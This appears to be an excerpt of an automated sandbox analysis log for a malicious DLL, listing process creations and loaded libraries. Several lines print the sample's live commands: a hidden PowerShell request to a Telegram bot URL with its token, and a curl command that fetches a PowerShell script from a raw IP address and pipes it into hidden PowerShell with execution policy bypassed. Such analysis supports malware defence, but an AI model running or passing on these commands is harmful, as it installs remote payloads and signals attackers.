            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES374.tmp" "c:\Users\user\AppData\Local\Temp\3vvszjlk\CSC1C049BEBEBAF4B45B9D79F1CA1976831.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\iviewers.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServerJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.cmdline"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF462.tmp" "c:\Users\user\AppData\Local\Temp\xyq5akbp\CSC3C74FAAA7254A90B38FFB13CA21DCB4.TMP"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF463.tmp" "c:\Users\user\AppData\Local\Temp\1yj35v5c\CSC1D664DFBC1CF4D3B97F036955FDEE5EE.TMP"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF461.tmp" "c:\Users\user\AppData\Local\Temp\wzlesmvi\CSC11B817DA9D55460CBF45133E7BAA649F.TMP"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES374.tmp" "c:\Users\user\AppData\Local\Temp\3vvszjlk\CSC1C049BEBEBAF4B45B9D79F1CA1976831.TMP"
            Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
